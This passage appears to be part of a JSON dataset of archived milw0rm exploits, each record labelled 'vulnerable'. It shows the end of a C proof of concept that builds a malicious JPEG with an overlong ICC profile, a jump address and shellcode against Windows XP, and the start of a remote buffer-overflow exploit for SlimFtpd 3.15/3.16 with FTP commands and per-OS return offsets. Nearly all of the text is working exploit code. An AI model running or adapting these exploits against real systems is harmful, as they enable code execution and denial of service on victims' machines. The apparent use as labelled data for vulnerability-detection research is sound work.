\\x04\\x06\\x04\\x13\"\n\n\"\\x04\\x20\\x04\\x2D\\x04\\x3B\\x04\\x48\\x04\\x55\\x04\\x63\\x04\\x71\\x04\\x7E\"\n\n\"\\x04\\x8C\\x04\\x9A\\x04\\xA8\\x04\\xB6\\x04\\xC4\\x04\\xD3\\x04\\xE1\\x04\\xF0\"\n\n\"\\x04\\xFE\\x05\\x0D\\x05\\x1C\\x05\\x2B\\x05\\x3A\\x05\\x49\\x05\\x58\\x05\\x67\"\n\n\"\\x05\\x77\\x05\\x86\\x05\\x96\\x05\\xA6\\x05\\xB5\\x05\\xC5\\x05\\xD5\\x05\\xE5\"\n\n\"\\x05\\xF6\\x06\\x06\\x06\\x16\\x06\\x27\\x06\\x37\\x06\\x48\\x06\\x59\\x06\\x6A\"\n\n\"\\x06\\x7B\\x06\\x8C\\x06\\x9D\\x06\\xAF\\x06\\xC0\\x06\\xD1\\x06\\xE3\\x06\\xF5\"\n\n\"\\x07\\x07\\x07\\x19\\x07\\x2B\\x07\\x3D\\x07\\x4F\\x07\\x61\\x07\\x74\\x07\\x86\"\n\n\"\\x07\\x99\\x07\\xAC\\x07\\xBF\\x07\\xD2\\x07\\xE5\\x07\\xF8\\x08\\x0B\\x08\\x1F\"\n\n\"\\x08\\x32\\x08\\x46\\x08\\x5A\\x08\\x6E\\x08\\x82\\x08\\x96\\x08\\xAA\\x08\\xBE\"\n\n\"\\x08\\xD2\\x08\\xE7\\x08\\xFB\\x09\\x10\\x09\\x25\\x09\\x3A\\x09\\x4F\\x09\\x64\"\n\n\"\\x09\\x79\\x09\\x8F\\x09\\xA4\\x09\\xBA\\x09\\xCF\\x09\\xE5\\x09\\xFB\\x0A\\x11\"\n\n\"\\x0A\\x27\\x0A\\x3D\\x0A\\x54\\x0A\\x6A\\x0A\\x81\\x0A\\x98\\x0A\\xAE\\x0A\\xC5\"\n\n\"\\x0A\\xDC\\x0A\\xF3\\x0B\\x0B\\x0B\\x22\\x0B\\x39\\x0B\\x51\\x0B\\x69\\x0B\\x80\"\n\n\"\\x0B\\x98\\x0B\\xB0\\x0B\\xC8\\x0B\\xE1\\x0B\\xF9\\x0C\\x12\\x0C\\x2A\\x0C\\x43\"\n\n\"\\x0C\\x5C\\x0C\\x75\\x0C\\x8E\\x0C\\xA7\\x0C\\xC0\\x0C\\xD9\\x0C\\xF3\\x0D\\x0D\"\n\n\"\\x0D\\x26\\x0D\\x40\\x0D\\x5A\\x0D\\x74\\x0D\\x8E\\x0D\\xA9\\x0D\\xC3\\x0D\\xDE\"\n\n\"\\x0D\\xF8\\x0E\\x13\\x0E\\x2E\\x0E\\x49\\x0E\\x64\\x0E\\x7F\\x0E\\x9B\\x0E\\xB6\"\n\n\"\\x0E\\xD2\\x0E\\xEE\\x0F\\x09\\x0F\\x25\\x0F\\x41\\x0F\\x5E\\x0F\\x7A\\x0F\\x96\"\n\n\"\\x0F\\xB3\\x0F\\xCF\\x0F\\xEC\\x10\\x09\\x10\\x26\\x10\\x43\\x10\\x61\\x10\\x7E\"\n\n\"\\x10\\x9B\\x10\\xB9\\x10\\xD7\\x10\\xF5\\x11\\x13\\x11\\x31\\x11\\x4F\\x11\\x6D\"\n\n\"\\x11\\x8C\\x11\\xAA\\x11\\xC9\\x11\\xE8\\x12\\x07\\x12\\x26\\x12\\x45\\x12\\x64\"\n\n\"\\x12\\x84\\x12\\xA3\\x12\\xC3\\x12\\xE3\\x13\\x03\\x13\\x23\\x13\\x43\\x13\\x63\"\n\n\"\\x13\\x83\\x13\\xA4\\x13\\xC5\\x13\\xE5\\x14\\x06\\x14\\x27\\x14\\x49\\x14\\x6A\"\n\n\"\\x14\\x8B\\x14\\xAD\\x14\\xCE\\x14\\xF0\\x15\\x12\\x15\\x34\\x15\\x56\\x15\\x78\"\n\n\"\\x15\\x9B\\x15\\xBD\\x15\\xE0\\x16\\x03\\x16\\x26\\x16\\x49\\x16\\x6C\\x16\\x8F\"\n\n\"\\x16\\xB2\\x16\\xD6\\x16\\xFA\\x17\\x1D\\x17\\x41\\x17\\x65\\x17\\x89\\x17\\xAE\"\n\n\"\\x17\\xD2\\x17\\xF7\\x18\\x1B\\x18\\x40\\x18\\x65\\x18\\x8A\\x18\\xAF\\x18\\xD5\"\n\n\"\\x18\\xFA\\x19\\x20\\x19\\x45\\x19\\x6B\\x19\\x91\\x19\\xB7\\x19\\xDD\\x1A\\x04\"\n\n\"\\x1A\\x2A\\x1A\\x51\\x1A\\x77\\x1A\\x9E\\x1A\\xC5\\x1A\\xEC\\x1B\\x14\\x1B\\x3B\"\n\n\"\\x1B\\x63\\x1B\\x8A\\x1B\\xB2\\x1B\\xDA\\x1C\\x02\\x1C\\x2A\\x1C\\x52\\x1C\\x7B\"\n\n\"\\x1C\\xA3\\x1C\\xCC\\x1C\\xF5\\x1D\\x1E\\x1D\\x47\\x1D\\x70\\x1D\\x99\\x1D\\xC3\"\n\n\"\\x1D\\xEC\\x1E\\x16\\x1E\\x40\\x1E\\x6A\\x1E\\x94\\x1E\\xBE\\x1E\\xE9\\x1F\\x13\"\n\n\"\\x1F\\x3E\\x1F\\x69\\x1F\\x94\\x1F\\xBF\\x1F\\xEA\\x20\\x15\\x20\\x41\\x20\\x6C\"\n\n\"\\x20\\x98\\x20\\xC4\\x20\\xF0\\x21\\x1C\\x21\\x48\\x21\\x75\\x21\\xA1\\x21\\xCE\"\n\n\"\\x21\\xFB\\x22\\x27\\x22\\x55\\x22\\x82\\x22\\xAF\\x22\\xDD\\x23\\x0A\\x23\\x38\"\n\n\"\\x23\\x66\\x23\\x94\\x23\\xC2\\x23\\xF0\\x24\\x1F\\x24\\x4D\\x24\\x7C\\x24\\xAB\"\n\n\"\\x24\\xDA\\x25\\x09\\x25\\x38\\x25\\x68\\x25\\x97\\x25\\xC7\\x25\\xF7\\x26\\x27\"\n\n\"\\x26\\x57\\x26\\x87\\x26\\xB7\\x26\\xE8\\x27\\x18\\x27\\x49\\x27\\x7A\\x27\\xAB\"\n\n\"\\x27\\xDC\\x28\\x0D\\x28\\x3F\\x28\\x71\\x28\\xA2\\x28\\xD4\\x29\\x06\\x29\\x38\"\n\n\"\\x29\\x6B\\x29\\x9D\\x29\\xD0\\x2A\\x02\\x2A\\x35\\x2A\\x68\\x2A\\x9B\\x2A\\xCF\"\n\n\"\\x2B\\x02\\x2B\\x36\\x2B\\x69\\x2B\\x9D\\x2B\\xD1\\x2C\\x05\\x2C\\x39\\x2C\\x6E\"\n\n\"\\x2C\\xA2\\x2C\\xD7\\x2D\\x0C\\x2D\\x41\\x2D\\x76\\x2D\\xAB\\x2D\\xE1\\x2E\\x16\"\n\n\"\\x2E\\x4C\\x2E\\x82\\x2E\\xB7\\x2E\\xEE\\x2F\\x24\\x2F\\x5A\\x2F\\x91\\x2F\\xC7\"\n\n\"\\x2F\\xFE\\x30\\x35\\x30\\x6C\\x30\\xA4\\x30\\xDB\\x31\\x12\\x31\\x4A\\x31\\x82\"\n\n\"\\x31\\xBA\\x31\\xF2\\x32\\x2A\\x32\\x63\\x32\\x9B\\x32\\xD4\\x33\\x0D\\x33\\x46\"\n\n\"\\x33\\x7F\\x33\\xB8\\x33\\xF1\\x34\\x2B\\x34\\x65\\x34\\x9E\\x34\\xD8\\x35\\x13\"\n\n\"\\x35\\x4D\\x35\\x87\\x35\\xC2\\x35\\xFD\\x36\\x37\\x36\\x72\\x36\\xAE\\x36\\xE9\"\n\n\"\\x37\\x24\\x37\\x60\\x37\\x9C\\x37\\xD7\\x38\\x14\\x38\\x50\\x38\\x8C\\x38\\xC8\"\n\n\"\\x39\\x05\\x39\\x42\\x39\\x7F\\x39\\xBC\\x39\\xF9\\x3A\\x36\\x3A\\x74\\x3A\\xB2\"\n\n\"\\x3A\\xEF\\x3B\\x2D\\x3B\\x6B\\x3B\\xAA\\x3B\\xE8\\x3C\\x27\\x3C\\x65\\x3C\\xA4\"\n\n\"\\x3C\\xE3\\x3D\\x22\\x3D\\x61\\x3D\\xA1\\x3D\\xE0\\x3E\\x20\\x3E\\x60\\x3E\\xA0\"\n\n\"\\x3E\\xE0\\x3F\\x21\\x3F\\x61\\x3F\\xA2\\x3F\\xE2\\x40\\x23\\x40\\x64\\x40\\xA6\"\n\n\"\\x40\\xE7\\x41\\x29\\x41\\x6A\\x41\\xAC\\x41\\xEE\\x42\\x30\\x42\\x72\\x42\\xB5\"\n\n\"\\x42\\xF7\\x43\\x3A\\x43\\x7D\\x43\\xC0\\x44\\x03\\x44\\x47\\x44\\x8A\\x44\\xCE\"\n\n\"\\x45\\x12\\x45\\x55\\x45\\x9A\\x45\\xDE\\x46\\x22\\x46\\x67\\x46\\xAB\\x46\\xF0\"\n\n\"\\x47\\x35\\x47\\x7B\\x47\\xC0\\x48\\x05\\x48\\x4B\\x48\\x91\\x48\\xD7\\x49\\x1D\"\n\n\"\\x49\\x63\\x49\\xA9\\x49\\xF0\\x4A\\x37\\x4A\\x7D\\x4A\\xC4\\x4B\\x0C\\x4B\\x53\"\n\n\"\\x4B\\x9A\\x4B\\xE2\\x4C\\x2A\\x4C\\x72\\x4C\\xBA\\x4D\\x02\\x4D\\x4A\\x4D\\x93\"\n\n\"\\x4D\\xDC\\x4E\\x25\\x4E\\x6E\\x4E\\xB7\\x4F\\x00\\x4F\\x49\\x4F\\x93\\x4F\\xDD\"\n\n\"\\x50\\x27\\x50\\x71\\x50\\xBB\\x51\\x06\\x51\\x50\\x51\\x9B\\x51\\xE6\\x52\\x31\"\n\n\"\\x52\\x7C\\x52\\xC7\\x53\\x13\\x53\\x5F\\x53\\xAA\\x53\\xF6\\x54\\x42\\x54\\x8F\"\n\n\"\\x54\\xDB\\x55\\x28\\x55\\x75\\x55\\xC2\\x56\\x0F\\x56\\x5C\\x56\\xA9\\x56\\xF7\"\n\n\"\\x57\\x44\\x57\\x92\\x57\\xE0\\x58\\x2F\\x58\\x7D\\x58\\xCB\\x59\\x1A\\x59\\x69\"\n\n\"\\x59\\xB8\\x5A\\x07\\x5A\\x56\\x5A\\xA6\\x5A\\xF5\\x5B\\x45\\x5B\\x95\\x5B\\xE5\"\n\n\"\\x5C\\x35\\x5C\\x86\\x5C\\xD6\\x5D\\x27\\x5D\\x78\\x5D\\xC9\\x5E\\x1A\\x5E\\x6C\"\n\n\"\\x5E\\xBD\\x5F\\x0F\\x5F\\x61\\x5F\\xB3\\x60\\x05\\x60\\x57\\x60\\xAA\\x60\\xFC\"\n\n\"\\x61\\x4F\\x61\\xA2\\x61\\xF5\\x62\\x49\\x62\\x9C\\x62\\xF0\\x63\\x43\\x63\\x97\"\n\n\"\\x63\\xEB\\x64\\x40\\x64\\x94\\x64\\xE9\\x65\\x3D\\x65\\x92\\x65\\xE7\\x66\\x3D\"\n\n\"\\x66\\x92\\x66\\xE8\\x67\\x3D\\x67\\x93\\x67\\xE9\\x68\\x3F\\x68\\x96\\x68\\xEC\"\n\n\"\\x69\\x43\\x69\\x9A\\x69\\xF1\\x6A\\x48\\x6A\\x9F\\x6A\\xF7\\x6B\\x4F\\x6B\\xA7\"\n\n\"\\x6B\\xFF\\x6C\\x57\\x6C\\xAF\\x6D\\x08\\x6D\\x60\\x6D\\xB9\\x6E\\x12\\x6E\\x6B\"\n\n\"\\x6E\\xC4\\x6F\\x1E\\x6F\\x78\\x6F\\xD1\\x70\\x2B\\x70\\x86\\x70\\xE0\\x71\\x3A\"\n\n\"\\x71\\x95\\x71\\xF0\\x72\\x4B\\x72\\xA6\\x73\\x01\\x73\\x5D\\x73\\xB8\\x74\\x14\"\n\n\"\\x74\\x70\\x74\\xCC\\x75\\x28\\x75\\x85\\x75\\xE1\\x76\\x3E\\x76\\x9B\\x76\\xF8\"\n\n\"\\x77\\x56\\x77\\xB3\\x78\\x11\\x78\\x6E\\x78\\xCC\\x79\\x2A\\x79\\x89\\x79\\xE7\"\n\n\"\\x7A\\x46\\x7A\\xA5\\x7B\\x04\\x7B\\x63\\x7B\\xC2\\x7C\\x21\\x7C\\x81\\x7C\\xE1\"\n\n\"\\x7D\\x41\\x7D\\xA1\\x7E\\x01\\x7E\\x62\\x7E\\xC2\\x7F\\x23\\x7F\\x84\\x7F\\xE5\"\n\n\"\\x80\\x47\\x80\\xA8\\x81\\x0A\\x81\\x6B\\x81\\xCD\\x82\\x30\\x82\\x92\\x82\\xF4\"\n\n\"\\x83\\x57\\x83\\xBA\\x84\\x1D\\x84\\x80\\x84\\xE3\\x85\\x47\\x85\\xAB\\x86\\x0E\"\n\n\"\\x86\\x72\\x86\\xD7\\x87\\x3B\\x87\\x9F\\x88\\x04\\x88\\x69\\x88\\xCE\\x89\\x33\"\n\n\"\\x89\\x99\\x89\\xFE\\x8A\\x64\\x8A\\xCA\\x8B\\x30\\x8B\\x96\\x8B\\xFC\\x8C\\x63\"\n\n\"\\x8C\\xCA\\x8D\\x31\\x8D\\x98\\x8D\\xFF\\x8E\\x66\\x8E\\xCE\\x8F\\x36\\x8F\\x9E\"\n\n\"\\x90\\x06\\x90\\x6E\\x90\\xD6\\x91\\x3F\\x91\\xA8\\x92\\x11\\x92\\x7A\\x92\\xE3\"\n\n\"\\x93\\x4D\\x93\\xB6\\x94\\x20\\x94\\x8A\\x94\\xF4\\x95\\x5F\\x95\\xC9\\x96\\x34\"\n\n\"\\x96\\x9F\\x97\\x0A\\x97\\x75\\x97\\xE0\\x98\\x4C\\x98\\xB8\\x99\\x24\\x99\\x90\"\n\n\"\\x99\\xFC\\x9A\\x68\\x9A\\xD5\\x9B\\x42\\x9B\\xAF\\x9C\\x1C\\x9C\\x89\\x9C\\xF7\"\n\n\"\\x9D\\x64\\x9D\\xD2\\x9E\\x40\\x9E\\xAE\\x9F\\x1D\\x9F\\x8B\\x9F\\xFA\\xA0\\x69\"\n\n\"\\xA0\\xD8\\xA1\\x47\\xA1\\xB6\\xA2\\x26\\xA2\\x96\\xA3\\x06\\xA3\\x76\\xA3\\xE6\"\n\n\"\\xA4\\x56\\xA4\\xC7\\xA5\\x38\\xA5\\xA9\\xA6\\x1A\\xA6\\x8B\\xA6\\xFD\\xA7\\x6E\"\n\n\"\\xA7\\xE0\\xA8\\x52\\xA8\\xC4\\xA9\\x37\\xA9\\xA9\\xAA\\x1C\\xAA\\x8F\\xAB\\x02\"\n\n\"\\xAB\\x75\\xAB\\xE9\\xAC\\x5C\\xAC\\xD0\\xAD\\x44\\xAD\\xB8\\xAE\\x2D\\xAE\\xA1\"\n\n\"\\xAF\\x16\\xAF\\x8B\\xB0\\x00\\xB0\\x75\\xB0\\xEA\\xB1\\x60\\xB1\\xD6\\xB2\\x4B\"\n\n\"\\xB2\\xC2\\xB3\\x38\\xB3\\xAE\\xB4\\x25\\xB4\\x9C\\xB5\\x13\\xB5\\x8A\\xB6\\x01\"\n\n\"\\xB6\\x79\\xB6\\xF0\\xB7\\x68\\xB7\\xE0\\xB8\\x59\\xB8\\xD1\\xB9\\x4A\\xB9\\xC2\"\n\n\"\\xBA\\x3B\\xBA\\xB5\\xBB\\x2E\\xBB\\xA7\\xBC\\x21\\xBC\\x9B\\xBD\\x15\\xBD\\x8F\"\n\n\"\\xBE\\x0A\\xBE\\x84\\xBE\\xFF\\xBF\\x7A\\xBF\\xF5\\xC0\\x70\\xC0\\xEC\\xC1\\x67\"\n\n\"\\xC1\\xE3\\xC2\\x5F\\xC2\\xDB\\xC3\\x58\\xC3\\xD4\\xC4\\x51\\xC4\\xCE\\xC5\\x4B\"\n\n\"\\xC5\\xC8\\xC6\\x46\\xC6\\xC3\\xC7\\x41\\xC7\\xBF\\xC8\\x3D\\xC8\\xBC\\xC9\\x3A\"\n\n\"\\xC9\\xB9\\xCA\\x38\\xCA\\xB7\\xCB\\x36\\xCB\\xB6\\xCC\\x35\\xCC\\xB5\\xCD\\x35\"\n\n\"\\xCD\\xB5\\xCE\\x36\\xCE\\xB6\\xCF\\x37\\xCF\\xB8\\xD0\\x39\\xD0\\xBA\\xD1\\x3C\"\n\n\"\\xD1\\xBE\\xD2\\x3F\\xD2\\xC1\\xD3\\x44\\xD3\\xC6\\xD4\\x49\\xD4\\xCB\\xD5\\x4E\"\n\n\"\\xD5\\xD1\\xD6\\x55\\xD6\\xD8\\xD7\\x5C\\xD7\\xE0\\xD8\\x64\\xD8\\xE8\\xD9\\x6C\"\n\n\"\\xD9\\xF1\\xDA\\x76\\xDA\\xFB\\xDB\\x80\\xDC\\x05\\xDC\\x8A\\xDD\\x10\\xDD\\x96\"\n\n\"\\xDE\\x1C\\xDE\\xA2\\xDF\\x29\\xDF\\xAF\\xE0\\x36\\xE0\\xBD\\xE1\\x44\\xE1\\xCC\"\n\n\"\\xE2\\x53\\xE2\\xDB\\xE3\\x63\\xE3\\xEB\\xE4\\x73\\xE4\\xFC\\xE5\\x84\\xE6\\x0D\"\n\n\"\\xE6\\x96\\xE7\\x1F\\xE7\\xA9\\xE8\\x32\\xE8\\xBC\\xE9\\x46\\xE9\\xD0\\xEA\\x5B\"\n\n\"\\xEA\\xE5\\xEB\\x70\\xEB\\xFB\\xEC\\x86\\xED\\x11\\xED\\x9C\\xEE\\x28\\xEE\\xB4\"\n\n\"\\xEF\\x40\\xEF\\xCC\\xF0\\x58\\xF0\\xE5\\xF1\\x72\\xF1\\xFF\\xF2\\x8C\\xF3\\x19\"\n\n\"\\xF3\\xA7\\xF4\\x34\\xF4\\xC2\\xF5\\x50\\xF5\\xDE\\xF6\\x6D\\xF6\\xFB\\xF7\\x8A\"\n\n\"\\xF8\\x19\\xF8\\xA8\\xF9\\x38\\xF9\\xC7\\xFA\\x57\\xFA\\xE7\\xFB\\x77\\xFC\\x07\"\n\n\"\\xFC\\x98\\xFD\\x29\\xFD\\xBA\\xFE\\x4B\\xFE\\xDC\\xFF\\x6D\\xFF\\xFF\\xFF\\xFE\"\n\n\"\\x00\\x1F\\x4C\\x45\\x41\\x44\\x20\\x54\\x65\\x63\\x68\\x6E\\x6F\\x6C\\x6F\\x67\"\n\n\"\\x69\\x65\\x73\\x20\\x49\\x6E\\x63\\x2E\\x20\\x56\\x31\\x2E\\x30\\x31\\x00\\xFF\"\n\n\"\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x03\\x03\"\n\n\"\\x02\\x03\\x04\\x07\\x04\\x04\\x03\\x03\\x04\\x08\\x06\\x06\\x05\\x07\\x0A\\x09\"\n\n\"\\x0A\\x0A\\x0A\\x09\\x0A\\x09\\x0B\\x0C\\x10\\x0E\\x0B\\x0C\\x0F\\x0C\\x09\\x0A\"\n\n\"\\x0E\\x13\\x0E\\x0F\\x11\\x11\\x12\\x12\\x12\\x0B\\x0D\\x14\\x15\\x14\\x12\\x15\"\n\n\"\\x10\\x12\\x12\\x11\\x01\\x03\\x03\\x03\\x04\\x03\\x04\\x08\\x04\\x04\\x08\\x11\"\n\n\"\\x0B\\x0A\\x0B\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n\n\"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n\n\"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n\n\"\\x11\\x11\\x11\\x11\\x11\\xFF\\xC4\\x01\\xA2\\x00\\x00\\x01\\x05\\x01\\x01\\x01\"\n\n\"\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x03\\x04\\x05\"\n\n\"\\x06\\x07\\x08\\x09\\x0A\\x0B\\x01\\x00\\x03\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"\n\n\"\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\"\n\n\"\\x09\\x0A\\x0B\\x10\\x00\\x02\\x01\\x03\\x03\\x02\\x04\\x03\\x05\\x05\\x04\\x04\"\n\n\"\\x00\\x00\\x01\\x7D\\x01\\x02\\x03\\x00\\x04\\x11\\x05\\x12\\x21\\x31\\x41\\x06\"\n\n\"\\x13\\x51\\x61\\x07\\x22\\x71\\x14\\x32\\x81\\x91\\xA1\\x08\\x23\\x42\\xB1\\xC1\"\n\n\"\\x15\\x52\\xD1\\xF0\\x24\\x33\\x62\\x72\\x82\\x09\\x0A\\x16\\x17\\x18\\x19\\x1A\"\n\n\"\\x25\\x26\\x27\\x28\\x29\\x2A\\x34\\x35\\x36\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\"\n\n\"\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\\x65\"\n\n\"\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7A\\x83\\x84\\x85\"\n\n\"\\x86\\x87\\x88\\x89\\x8A\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9A\\xA2\\xA3\"\n\n\"\\xA4\\xA5\\xA6\\xA7\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\\xB7\\xB8\\xB9\\xBA\"\n\n\"\\xC2\\xC3\\xC4\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\\xD4\\xD5\\xD6\\xD7\\xD8\"\n\n\"\\xD9\\xDA\\xE1\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\\xF1\\xF2\\xF3\\xF4\"\n\n\"\\xF5\\xF6\\xF7\\xF8\\xF9\\xFA\\x11\\x00\\x02\\x01\\x02\\x04\\x04\\x03\\x04\\x07\"\n\n\"\\x05\\x04\\x04\\x00\\x01\\x02\\x77\\x00\\x01\\x02\\x03\\x11\\x04\\x05\\x21\\x31\"\n\n\"\\x06\\x12\\x41\\x51\\x07\\x61\\x71\\x13\\x22\\x32\\x81\\x08\\x14\\x42\\x91\\xA1\"\n\n\"\\xB1\\xC1\\x09\\x23\\x33\\x52\\xF0\\x15\\x62\\x72\\xD1\\x0A\\x16\\x24\\x34\\xE1\"\n\n\"\\x25\\xF1\\x17\\x18\\x19\\x1A\\x26\\x27\\x28\\x29\\x2A\\x35\\x36\\x37\\x38\\x39\"\n\n\"\\x3A\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\\x56\\x57\\x58\\x59\"\n\n\"\\x5A\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\\x75\\x76\\x77\\x78\\x79\"\n\n\"\\x7A\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\\x92\\x93\\x94\\x95\\x96\\x97\"\n\n\"\\x98\\x99\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\"\n\n\"\\xB6\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\"\n\n\"\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\"\n\n\"\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\\xF8\\xF9\\xFA\\xFF\\xC0\\x00\\x11\\x08\\x01\\x20\"\n\n\"\\x01\\xE0\\x03\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\xFF\\xDA\\x00\\x0C\"\n\n\"\\x03\\x01\\x00\\x02\\x11\\x03\\x11\\x00\\x3F\\x00\\xFD\\xFC\\xA0\\x02\\x80\\x0A\"\n\n\"\\x00\\x28\\x00\\xA0\\x02\\x80\\x0A\\x00\\x28\\x00\\xA0\\x02\\x80\\x0A\\x00\\x28\";\n\n\n\nstruct {\n\nchar *os;\n\nlong jmpADD;\n\n}\n\n\n\ntargets[] = {\n\n{\n\n\"Window XP (en) SP1\",\n\n0x04efff00 // this jumps to shellcode\n\n},\n\n{\n\n\"Dummy (crash all)\",\n\n0x43434343 // this jumps to shellcode\n\n},\n\n}, v;\n\n\n\n/*\n\n* Harmless payload that spawns 'notepad.exe'... =p\n\n*/\n\n\n\nchar shellcode[]=\n\n\"\\x55\" // push ebp \n\n\"\\x8b\\xec\" // mov ebp, esp\n\n\"\\x33\\xf6\" // xor esi, esi\n\n\"\\x56\" // push esi\n\n\"\\x68\\x2e\\x65\\x78\\x65\" // push 'exe.'\n\n\"\\x68\\x65\\x70\\x61\\x64\" // push 'dape'\n\n\"\\x68\\x90\\x6e\\x6f\\x74\" // push 'ton'\n\n\"\\x46\" // inc esi \n\n\"\\x56\" // push esi\n\n\"\\x8d\\x7d\\xf1\" // lea edi, [ebp-0xf] \n\n\"\\x57\" // push edi \n\n\"\\xb8XXXX\" // mov eax, XXXX -> WinExec() \n\n\"\\xff\\xd0\" // call eax\n\n\"\\x4e\" // dec esi\n\n\"\\x56\" // push esi\n\n\"\\xb8YYYY\" // mov eax, YYYY -> ExitProcess() \n\n\"\\xff\\xd0\"; // call eax\n\n\n\nunsigned char b[4];\n\n\n\nvoid get_bytes(long word) {\n\nb[0]=word&0xff;\n\nb[1]=(word>>8)&0xff;\n\nb[2]=(word>>16)&0xff;\n\nb[3]=(word>>24)&0xff;\n\n}\n\n\n\nvoid err_exit(char *s)\n\n{\n\nprintf(\"%s\\n\",s);\n\nexit(0);\n\n}\n\n\n\nvoid filladdr()\n\n{\n\nchar *ptr;\n\nint i=0;\n\n\n\nlong addr1=(long)WinExec;\n\nlong addr2=(long)ExitProcess;\n\n\n\nprintf(\"-> WinExec() is at: 0x%08x\\n\",addr1);\n\nprintf(\"-> ExitProcess() is at: 0x%08x\\n\",addr2);\n\n\n\nptr=shellcode;\n\n\n\nwhile (*ptr!='\\0') {\n\nif (*((long *)ptr)==0x58585858) {\n\nprintf(\"-> Filling in WinExec at offset: %d\\n\",(ptr-shellcode));\n\n*((long *)ptr)=addr1;\n\n}\n\nif (*((long *)ptr)==0x59595959) {\n\nprintf(\"-> Filling in ExitProcess at offset: %d\\n\",(ptr-shellcode));\n\n*((long *)ptr)=addr2;\n\n}\n\nptr++;\n\n}\n\n\n\nmemcpy(buff+EIP_OFFSET,b,sizeof(b));\n\n\n\n}\n\n\n\nvoid buildfile() \n\n{\n\nint i=0;\n\nFILE *fd;\n\n\n\nif ((fd=fopen(FNAME,\"wb\"))==NULL) {\n\nerr_exit(\"-> Failed to generate file...\");\n\n}\n\n\n\nfor(;i<BSIZE;i++) {\n\nfputc(buff[i],fd);\n\n}\n\n\n\nfclose(fd);\n\n\n\nprintf(\"-> '%s' generated. (%d bytes)\\n\",FNAME,i);\n\n\n\n}\n\n\n\nvoid fillshellcode()\n\n{\n\nchar *ptr;\n\n\n\nmemset(buff+NOP_OFFSET,NOP,NOP_SIZE);\n\n\n\nptr=shellcode;\n\n\n\nwhile (*ptr!='\\0') {\n\nget_bytes(*((long *)(ptr)));\n\n*ptr=b[3];\n\n*(ptr+1)=b[2];\n\n*(ptr+2)=b[1];\n\n*(ptr+3)=b[0];\n\nptr=ptr+4;\n\n}\n\n\n\nmemcpy(buff+SC_OFFSET,shellcode,sizeof(shellcode));\n\n}\n\n\n\nint main(int argc, char *argv[]) \n\n{\n\nint i=0, t=TARGET;\n\n\n\nif (argc==2) { t=atoi(argv[1]); }\n\n\n\nget_bytes(targets[t-1].jmpADD);\n\n\n\nprintf(\"\\nICC Overflow PoC, By Snooq [jinyean@hotmail.com]\\n\\n\");\n\n\n\nprintf(\"-> Generating 'jpg' file for target #%d...\\n\",t);\n\n\n\nfilladdr();\n\nfillshellcode();\n\nbuildfile();\n\n\n\nreturn 0;\n\n\n\n}\n\n\n\n// milw0rm.com [2005-07-21]",
635        "vulnerable": true
636    },
637    {
638        "exploit_id": 1118,
639        "content": "/*\n\n*\n\n*\tWritten by redsand\n\n*\t<redsand@redsand.net>\n\n*\n\n*\tJul 22, 2005\n\n*\tVulnerable: SlimFtpd v3.15 and v3.16\n\n*\torigional vuln found by: \n\n*\n\n*\tUsage: ./redslim 127.0.0.1 [# OS RET ]\n\n*\n\n*/\n\n\n\n\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#ifdef WIN\n\n  #include <winsock2.h>\n\n  #include <windows.h>\n\n// #pragma lib <ws2_32.lib> // win32-lcc specific\n\n  #pragma comment(lib, \"ws2_32.lib\") // ms vc++\n\n#else\n\n  #include <unistd.h>\n\n  #include <sys/socket.h>\n\n  #include <sys/types.h>\n\n  #include <arpa/inet.h>\n\n  #include <netdb.h>\n\n#endif\n\n\n\n\n\n#define USERNAME\t\"anonymous\"\n\n#define PASSWORD\t\"log@in.net\"\n\n\n\n\n\n// buf size = 512 + max\n\n\n\n#define NOP\t\t\t\t0x90\t\n\n#define BUFSIZE\t\t\t2048\n\n#define PORT\t\t\t21\n\n#define LSZ\t\t\t\t525 \n\n\n\nunsigned char *login [] = { \"USER \"USERNAME\"\\r\\n\", \"PASS \"PASSWORD\"\\r\\n\", \"LIST \", \"XMKD AAAAAAAA\\r\\n\", \"CWD AAAAAAAA\\r\\n\", NULL };\n\n\n\nunsigned char *targets [] =\n\n        {\n\n            \"Windows XP SP0/SP1 \",\n\n\t\t\t\"Windows XP SP2 \",\n\n            \"Windows 2000 SP1/SP4 \",\n\n\t\t\t\"Windows 2003 Server SP1\",\n\n\t\t\t\"Denial-of-Service\",\n\n             NULL\n\n        };\n\n\n\nunsigned long offsets [] =\n\n        {\n\n\t\t\t// jmp esi\n\n\t\t\t0x71a5b80b, // Windows XP 